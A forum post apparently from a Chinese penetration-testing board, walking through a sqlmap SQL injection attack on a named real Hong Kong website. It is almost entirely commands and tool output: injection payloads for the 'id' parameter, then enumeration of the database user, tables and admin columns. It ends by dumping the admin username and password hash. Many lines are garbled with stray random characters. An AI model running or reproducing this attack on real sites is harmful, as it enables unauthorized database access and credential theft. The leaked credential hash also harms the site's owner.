中国网络渗透测试联盟

标题: sqlmap实例注入mysql [打印本页]

作者: admin    时间: 2013-4-4 22:18
标题: sqlmap实例注入mysql
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db& D/ j1 [! u- t) H$ F
ms "Mysql" --current-user       /*  注解:获取当前用户名称$ h6 [6 ^* y2 c" i8 z
    sqlmap/0.9 - automatic SQL injection and database takeover tool% Q( G4 W& M) w* J+ p  `
    http://sqlmap.sourceforge.net
  • starting at: 16:53:54
    / F$ ~, Z; k5 t; H( ~$ Z& c# {[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# W  H4 N: V4 w2 L4 b! L. o% y
    session file" q5 J$ n* E: J3 h# Q3 J
    [16:53:54] [INFO] resuming injection data from session file
      w, c$ T9 v0 C+ S[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ( A( f2 ~( ~$ d4 q[16:53:54] [INFO] testing connection to the target url
    + o4 W) Q- U8 l8 j- k- t$ N! Asqlmap identified the following injection points with a total of 0 HTTP(s) reque
    3 C$ G; v" {( c' H, ~* Zsts:
    + C1 L* D; i; l% O8 t: C" |---, Q. z6 G2 ]0 h7 E3 c' z; Y& J
    Place: GET1 X7 b6 v) _, L4 ~/ Y; X8 i; R
    Parameter: id
    $ E  X& q1 J; u4 a5 [' a4 m0 P    Type: boolean-based blind, s! T! V6 s- ]& h' w* R% F1 \( O2 `
        Title: AND boolean-based blind - WHERE or HAVING clause
    ( b4 [/ `& s6 B6 o( k6 z) c  L    Payload: id=276 AND 799=799
    6 ]1 ]0 V9 c1 o) O0 ~6 l5 ?    Type: error-based
    8 Z5 P4 f: g  {    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    7 o! P( R2 ~4 s$ ?0 y( Q7 w$ C    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,7 t1 z6 `/ ~4 `# Y3 _8 }; F- H
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    / a+ m) o+ L, V  @& m9 Q# ^1 _),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)$ `  }- c6 X/ q& @
        Type: UNION query  e" z( w: ]% d6 z1 L- F+ `
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    8 H1 Y2 Z; Z& m% r    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR8 C; Y5 g* T6 s3 S# C3 ]
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ! ?' a0 n9 A9 L2 }1 C1 [3 dCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    2 X; m: V- b. S8 ^( I    Type: AND/OR time-based blind
    , O) ^( A$ j* F* y" ?8 l+ V    Title: MySQL > 5.0.11 AND time-based blind
    5 R6 e( @0 s1 f& n+ o6 f- ^    Payload: id=276 AND SLEEP(5)1 I  P! O4 j" \: B: p( ]/ z% Z+ s
    ---
    : Z" H" l8 a  a; _' H& D% q[16:53:55] [INFO] the back-end DBMS is MySQL6 h+ c: U/ `  T) b' R
    web server operating system: Windows
    * y$ V8 [' w3 h8 Z" E" B: ^web application technology: Apache 2.2.11, PHP 5.3.0: ^' b" ~8 c( `5 U1 X
    back-end DBMS: MySQL 5.0
    7 R8 ^! ^/ F' R' m0 @. m2 A$ y[16:53:55] [INFO] fetching current user
    $ [( U& E+ `. V8 r5 ^* B2 zcurrent user:    'root@localhost'   
    5 z5 M. n6 S. T[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
      J; [; h' P7 A% rtput\www.wepost.com.hk'
  • shutting down at: 16:53:58& S+ k+ a7 y* u5 ~8 s

    0 \3 _1 a7 q% Z+ B5 F3 ^6 E* qD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    + k, |: r% I# f' P$ Yms "Mysql" --current-db                  /*当前数据库! ^" [- c( D3 h% z. L$ h+ V
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    ' n1 B/ T$ R; }* U    http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    $ r. `+ x" J8 D' J3 f[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as: f  O: F) h4 c% {- G
    session file
    / w0 q1 I. r8 a' v8 F[16:54:16] [INFO] resuming injection data from session file
      y4 q2 j/ ?- d; O* G[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file/ w! w* I" Z) ]& r! Y% V9 {% u6 [
    [16:54:16] [INFO] testing connection to the target url. k; m4 v3 Z. h4 E& L$ {
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    8 H# i" ~/ U' L3 V2 b+ s$ W. Asts:% d# C' e0 b' I7 z4 `' Z
    ---5 v1 u, ?& @3 `
    Place: GET0 n( l% P# |4 F) G
    Parameter: id( Z- j/ b, t9 j* z  x' X3 x
        Type: boolean-based blind% K* c7 Q+ P  y0 v# v
        Title: AND boolean-based blind - WHERE or HAVING clause
    " o- h& e& b0 X6 Y* N5 Q! g5 x    Payload: id=276 AND 799=799; t! \% A/ [- X# Y. E
        Type: error-based2 B& l2 O# V5 d: v' Z" T
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    / B2 x1 Q, ?/ E7 v3 [    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 F8 s- I" p7 x
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    6 r  A* P  n! P- T5 d0 V2 d),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    : p2 |4 ^2 f# a* _0 [& Z6 Q    Type: UNION query
    * A2 q4 v: q& q+ ~2 @+ l    Title: MySQL UNION query (NULL) - 1 to 10 columns+ K6 x3 ]' s  v( e
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR. e5 R0 {7 _: w
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    # [8 q  I: S, r% x4 ~+ dCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#4 A$ a' q8 n' o4 Z. l8 z
        Type: AND/OR time-based blind
    ) i- O* M6 ^; W& E4 }, L    Title: MySQL > 5.0.11 AND time-based blind3 b7 e8 l: t1 ~6 L0 @
        Payload: id=276 AND SLEEP(5)5 X( q% A) a: \: J2 j* E" G
    ---
    ) V9 y& W/ U% i4 S) ?[16:54:17] [INFO] the back-end DBMS is MySQL
    7 y8 X. |( W' f5 P3 l, Oweb server operating system: Windows& Q2 P8 [& T) ~! ]
    web application technology: Apache 2.2.11, PHP 5.3.0; {0 D: n+ m- X% J: N: P+ |1 u
    back-end DBMS: MySQL 5.0. }0 \  I3 a, h# E$ a0 M3 D
    [16:54:17] [INFO] fetching current database
    7 y* T7 A7 k( g# J& ~, D. k  {current database:    'wepost'
    4 V! g7 d5 S7 j  I( q  W9 h3 M( v[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    $ c+ Y1 A" V; \2 O- Y3 dtput\www.wepost.com.hk'
  • shutting down at: 16:54:18  i/ c, M( ?2 x/ i  b4 p
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# n7 K0 z  n. G8 G9 m; O  A) q9 D, O
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名/ l6 Y" w, U2 u  F5 {) @; b) M+ b8 |
        sqlmap/0.9 - automatic SQL injection and database takeover tool0 _8 o1 f& K/ M% c9 F4 T$ y
        http://sqlmap.sourceforge.net
  • starting at: 16:55:25
    " @7 l+ k! V) A' y0 d0 T: O5 z[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as2 Z6 H7 [% i" P. j
    session file  O6 b4 u4 u2 I
    [16:55:25] [INFO] resuming injection data from session file
    2 J8 _: B# B3 w[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    8 e/ ^& P( S1 d/ n# N$ C[16:55:25] [INFO] testing connection to the target url
    ' o3 V* G: |* u/ _7 msqlmap identified the following injection points with a total of 0 HTTP(s) reque% O" ?; ^- i/ v2 N* }
    sts:) w1 E& J# z/ x( t; V5 N' [
    ---
    6 L# _1 y, |9 o: Y) M/ [0 |( _Place: GET
      l, @5 m  c, V- vParameter: id
    / K2 i' i' _. u    Type: boolean-based blind9 T1 l# M6 {, d6 p3 N" L
        Title: AND boolean-based blind - WHERE or HAVING clause
    7 }$ O3 Z1 s1 Y' E0 C    Payload: id=276 AND 799=799
    : ^6 e6 M* R) I2 Q    Type: error-based3 X1 D; x+ f1 l# T( y
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    + \6 h6 T0 f4 W7 L$ `    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,8 \* H4 L& Z( Y/ H( k, R; [" T! a7 K
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    8 v8 E* r  T5 X' O2 x),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    1 w/ D6 q9 f. w3 ~7 _    Type: UNION query
    , v+ q4 R, E: U6 t. z    Title: MySQL UNION query (NULL) - 1 to 10 columns- R: E6 ^8 z& C* w
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    7 B, u- v$ j1 O0 R(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),$ w- m' _8 v8 ~4 |! a
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    & Y! R- ]+ k: L4 `+ m5 K( E* w    Type: AND/OR time-based blind' j/ t* O3 w0 H; |8 h
        Title: MySQL > 5.0.11 AND time-based blind
    ; j* L: U! h- Q( m7 O. X3 i1 ?    Payload: id=276 AND SLEEP(5)( r& ]9 Q* m8 J8 A6 m5 u. l
    ---
    # A: j4 F$ A3 _  y$ \[16:55:26] [INFO] the back-end DBMS is MySQL
    5 x. f. ]  ]8 r, j& Y  t( m% lweb server operating system: Windows
    % T3 P( @9 L) J5 M$ @. P0 }6 oweb application technology: Apache 2.2.11, PHP 5.3.0! A" A4 i) @' m+ a& C1 [
    back-end DBMS: MySQL 5.0
    % B! c; @* {" [; ^[16:55:26] [INFO] fetching tables for database 'wepost'
    $ ]% T6 M+ j: i- e, h; V[16:55:27] [INFO] the SQL query used returns 6 entries4 t: [, Q+ r6 ]/ k
    Database: wepost
    % J7 C# \( N7 b[6 tables]
    7 J8 ?+ S1 R6 ~1 h! ~" t; n+-------------+
    - J1 ]- y3 }0 _( G, P8 d( ^; D| admin       |
    . R6 R- Q* s7 K| article     |4 e: F" N8 e# j; n$ j
    | contributor |0 ?1 \7 J+ A6 a* m2 h3 W
    | idea        |
    * U# X- E) `" A8 X) u8 p+ Z| image       |! b1 V5 j2 N! f! ?
    | issue       |) @0 Y$ E* i4 z: s1 R! n0 S8 H
    +-------------+
    ) ^. D' T/ B. T; o[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    5 S- U  S4 @& E# f: Ctput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    8 w  J" W6 G9 N
    * |7 N: ]2 S# o+ X- L# G# a: |D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    : a. s; D( R- e1 ^" D- @/ Ems "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名
    3 Y. y3 g" y5 `9 k    sqlmap/0.9 - automatic SQL injection and database takeover tool1 Z1 C$ ?: c6 ~2 g+ [. t2 x3 q
        http://sqlmap.sourceforge.net
  • starting at: 16:56:060 o+ ]- g/ |* ~! T
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    ) R3 ?0 B) Y0 Z: D1 n4 vsts:
    & c% G6 `- n" ~---' {& n' g& Y) p' e" u, Z
    Place: GET
    $ f" d4 }6 A/ |: gParameter: id
    2 y6 ]1 }( N( x% T$ _! P    Type: boolean-based blind8 ^! ?4 W+ T2 d- H  g
        Title: AND boolean-based blind - WHERE or HAVING clause( p! ?, ^" x9 s4 K$ z9 i* K- ?1 J
        Payload: id=276 AND 799=799
      J8 p- @2 ?# s" R+ j# h3 }8 |    Type: error-based
    & k% }/ W% |/ E3 ^6 n    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause/ e( _( i. ^+ m$ r  [
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,, j/ b8 I% X( I) l1 S
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    8 p/ \0 h, N6 U/ |9 s7 X),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    4 T0 Y6 i5 Z$ b% F* j    Type: UNION query
    # N, q3 s  w; Z& J. r6 ^    Title: MySQL UNION query (NULL) - 1 to 10 columns
    , l3 ~# E0 O2 Q$ p6 x    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR6 A" C) H7 t# n/ C
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    7 O. D: L8 @0 I, Y4 lCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    . ~' d! s. X( O, x: h0 \5 Z: E    Type: AND/OR time-based blind: I" P" L2 [9 C2 u6 s. j
        Title: MySQL > 5.0.11 AND time-based blind3 \2 P0 t$ W6 f! P& F, Y
        Payload: id=276 AND SLEEP(5)' I: B. M: Y4 ~) x
    ---
    + [4 k( U: Y- V! P7 l9 Sweb server operating system: Windows) F0 Q7 z  z4 W4 p, \- [+ d' T
    web application technology: Apache 2.2.11, PHP 5.3.0
    4 _# J; l0 P3 o/ kback-end DBMS: MySQL 5.00 d% w5 G0 ?+ a( q
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se5 H6 A3 ?+ a+ h' {
    ssion': wepost, wepost" {. N- l  B- f) x& z  i, y; d
    Database: wepost
    0 [7 l) n9 N% K# J; R8 o& |- \Table: admin
    # c- Z: m: e; g, A9 Q% v7 Z[4 columns]
    * Z! i- P$ T7 m& V. b% w+----------+-------------+
    ' ?4 |/ A+ S' C- I& }- w| Column   | Type        |9 M7 g3 F$ A! ^5 @) R5 c1 g
    +----------+-------------+
      c5 \4 c- C0 Q| id       | int(11)     |
    - d( V! H7 s% h7 }. H| password | varchar(32) |. v8 n  y0 I1 p, [
    | type     | varchar(10) |" Q0 V9 d, m, W. N0 P) u, c  K
    | userid   | varchar(20) |
    ' ~( ]% Z3 Y% N% @  e7 M+----------+-------------+
    - R$ L: |5 I2 g7 m, O" D' L
  • shutting down at: 16:56:198 A: H8 @( V& W$ q, X+ N! D2 V
    8 G% P2 V( U, p
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    9 s/ m" G0 X* D  l  t3 j- Q/ ?" Lms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容  a( O! c  ?: Y( D
        sqlmap/0.9 - automatic SQL injection and database takeover tool
    ; V# F4 a. o$ v9 |    http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    2 Z; r7 L1 j. ?3 X- T* bsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    ; m0 V3 C# ]: Z4 X; m) Q0 Nsts:3 w" C/ U. c. r( L
    ---* W4 c5 M( b! i
    Place: GET
    % h/ S4 o: B4 @$ \5 E7 ZParameter: id9 N8 w3 t+ j  R: y
        Type: boolean-based blind' x# {- q/ Y* ~, v
        Title: AND boolean-based blind - WHERE or HAVING clause
    ( \/ B5 m0 O& [    Payload: id=276 AND 799=7992 r2 n; B+ E6 {
        Type: error-based
    8 ~9 I, C5 V. k$ c    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    & F! u$ u- X3 _, @& w    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118," F: ]. ]& Z$ P, b
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    5 F' m* f' c4 _, [6 {9 |),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)9 k1 v, S+ p) R( b" D( X6 S
        Type: UNION query, `6 [9 {- Y" Z6 o# V$ F
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    % c, i  P, G: m5 M5 _+ ?- B    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    # S- Y! t: C1 F) v(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' n8 d/ ^: q, }% ^
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#" P: u$ a0 e! [
        Type: AND/OR time-based blind7 e1 {4 x' T5 C# _1 {1 [
        Title: MySQL > 5.0.11 AND time-based blind. }7 p8 h( s2 D. s# o8 D2 L
        Payload: id=276 AND SLEEP(5)1 z5 w: p2 ^$ `2 G1 b
    ---
    $ P) I% Q; d' zweb server operating system: Windows
    " O1 ]9 n% c2 p) ]web application technology: Apache 2.2.11, PHP 5.3.0
    8 v& Q6 D) v* x/ f; rback-end DBMS: MySQL 5.0% X- l( k& y* W9 \# v  N  }
    recognized possible password hash values. do you want to use dictionary attack o4 z" L1 Q5 J$ z' K
    n retrieved table items? [Y/n/q] y
    5 [2 d" |, Z- P9 U4 `what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]- o3 x6 B' {6 C( c- b
    do you want to use common password suffixes? (slow!) [y/N] y
    5 t) ]/ h6 A" GDatabase: wepost( G; K: t# P- b
    Table: admin
    5 g! `5 S3 f5 H" U[1 entry]
    ; d6 A( c+ L4 Z  E+----------------------------------+------------+
    1 T4 }: d# \) k4 l| password                         | userid     |) _3 P6 G* l. s- m" T" f; o
    +----------------------------------+------------+( S1 ^: r, ^  p) P7 t* H6 b
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |  x6 D( W; b1 L" g$ u
    +----------------------------------+------------+
    # D3 k8 e& A3 _8 n5 q
  • shutting down at: 16:58:14
    ( f; i+ h$ |8 _' X, v% |- `3 c1 {- E# m* |
    D:\Python27\sqlmap>




    欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2